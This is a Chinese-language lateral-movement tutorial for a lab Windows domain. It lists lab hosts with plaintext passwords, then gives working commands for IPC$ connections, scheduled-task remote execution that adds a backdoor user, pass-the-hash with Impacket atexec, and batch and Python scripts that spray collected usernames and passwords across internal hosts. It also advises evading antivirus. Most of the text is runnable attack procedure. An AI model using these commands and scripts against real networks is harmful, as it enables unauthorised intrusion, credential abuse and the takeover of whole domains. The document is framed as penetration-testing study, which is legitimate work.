2008 r2 webserver
域内 web 服务器
本地管理员账号密码 :.\administraotr:admin!@#45
当前机器域用户密码 :god\webadmin:admin!@#45
-------------------------------------
2003 x86 fileserver
域内文件服务器
本地管理员账号密码 :
administrator : admin
当前机器域用户密码 :god\fileadmin : Admin12345
-------------------------------------
2008 r2 x64 dc god.org
主域控机器
域管账号密码:God\administrator : Admin12345
-------------------------------------
2012 sqlserver
域内数据库服务器
本地管理员账号密码 :.\administrator:admin!@#45
当前机器域用户密码 :god\dbadmin:admin!@#45
-------------------------------------
w7 x64 mary-pc
域内个人机
本地管理员账号密码 :.\mary : admin
当前机器域用户密码 :god\mary : admin!@#45
-------------------------------------
w8.1 x64 jack-pc
域内个人机
本地管理员账号密码 :.\jack:admin
当前机器域用户密码 :god\boss:Admin12345
#案例 1-横向渗透明文传递 at&schtasks
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?
这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主
机上执行命令。
获取到某域主机权限->minikatz 得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户
名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或
者相关命令
利用流程
1. 建立 IPC 链接到目标主机
2. 拷贝要执行的命令脚本到目标主机
3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4. 删除 IPC 链接
net use \\server\ipc$"password" /user:username # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除 IPC
net view xx.xx.xx.xx # 查看对方共享
#建立 IPC 常见的错误代码
(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有
防火墙等问题
(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
#建立 IPC 失败的原因
(1)目标系统不是 NT 或以上的操作系统
(2)对方没有打开 IPC$共享
(3)对方未开启 139、445 端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
[at] & [schtasks]
#at < Windows2012
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator # 建立 ipc 连接:
copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务#schtasks >=Windows2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator # 建立 ipc 连接:
copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务
对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务
案例演示
<1>获取到DC的IP地址。执行以下两个命令时,需要域用户登录,而不是本地用户登录
<2>假设已经找到DC的用户名密码(具体后面再详细讲)
<3>横向渗透
由于域控DC是Win2008R2(< Windows2012),可以使用at命令。
net use\\ip\ipc$ "password" /user:"username"
net use \\192.168.3.21\ipc$
"Admin12345"
/user
:god.org\administrator
# 建立ipc连接
copy add.bat \192.168.3.21\c$
#拷贝执行文件到目标机器的c盘
at \\192.168.3.21 15:47 c:\add.bat
#添加计划任务
一段时候后,xiaodi用户就自动添加成功了。
<4>如果目标计算机>=Windows2012,需要使用schtasks命令。
比如前期信息收集得到了sqlserver的用户名密码,SqlServer是window2012系统
如下图,当使用域用户登录时,copy是失败的,原因是权限不够,应该使用本地用户登录。
使用本地用户登录,执行如下命令
net use \\192.168.3.32\ipc$
"admin!@#45"
/user
:administrator # 建立ipc连接
copy add.bat \\192.168.3.32\c$
#复制文件到其C盘
schtasks
/create
/s
192.168.3.32
/ru
"SYSTEM"
/tn
adduser
/sc
DAILY
/tr
c:\add.bat /
F
#创建adduser任务对应执行文件
schtasks
/run
/s
192.168.3.32
/tn
adduser
/i
#运行adduser任务
schtasks
/delete
/s
192.168.3.21
/tn
adduser
/f
#删除adduser任务
等待一段时间,成功添加新用户。
net user 查看用户中是否多了一个xiaodi
net user xiaodi 查看xiaodi账户创建时间是否为刚才计划任务的时间
net user xiaodi /del 不需要了的话可以删除
#案例 2-横向渗透明文 HASH 传递 atexec-impacket
atexec
- 优点:一句话命令,连接、提权全部搞定。
- 缺点:第三方工具,非微软官方工具,易被杀毒软件查杀,实战中需要自己做一下免杀。
- atexec是Impacket网络协议工具包中的一个工具。Impacket工具包介绍:https://www.freebuf.com/sectool/175208.html
atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"
使用hash 密码的方式
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
案例演示
<1>impacket工具包下载,可下载exe版本
- 地址:https://gitee.com/RichChigga/impacket-examples-windows
<2>执行命令,直接提权
#案例 3-横向渗透明文 HASH 传递批量利用-综合
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文
连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应明文
回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应 IP
回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测
上面这两种方式每次只能验证一个用户和一个密码,下面用批处理进行批量建立连接:
HASH 对应 IP 回显版
#案例 4-横向渗透明文 HASH 传递批量利用-升级版
前期除了收集明文密码HASH等,还收集了用户名,用户名配合密码字典能吃西瓜?
net use \192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin
pip install pyinstaller
对于某些系统没有下载phthon
pyinstaller -F fuck_neiwang_001.py 生成可执行EXE
批量建立连接升级版.py文件
import os,time
收集到的内网存活主机ip
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.31',
'192.168.3.33'
}#net user /domain 等等收集到的用户
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'vpnadm',
'webadmin'
}#mimikate等等收集到的密码
passs={
'admin',
'admin!@#45',
'Admin12345'
}for ip in ips:
for user in users:
for mima in passs:
exec="net use \\"+ "\\"+ip+'\ipc$ '+mima+' /user:god\\'+user
print('--->'+exec+'<---')
os.system(exec)
time.sleep(1)
上面程序运行结束net use
查看建立了哪些连接,剩下的就是使用自带命令at&schtasks
上传脚本进行控制。
以上操作都是在我们知道用户和密码的情况下进行验证的,前期除了收集明文密码HASH等,还收集了用户名,用户名配合密码字典,进行上面的批量验证
主机A 收集主机A的用户名和密码 组成字典
主机B 用主机A的用户信息验证是否可以登录到主机B,如果可以登录在收集主机B的用户信息,将信息添加到上面的字典里。
主机C 用上面的字典验证是否可以登录到主机C,如果可以登录依旧收集相关信息添加到字典中不断重复上面步骤,收集的信息越多字典越大,我们验证成功的可能性越大,实现从获得1台主机到内网中所有主机的操作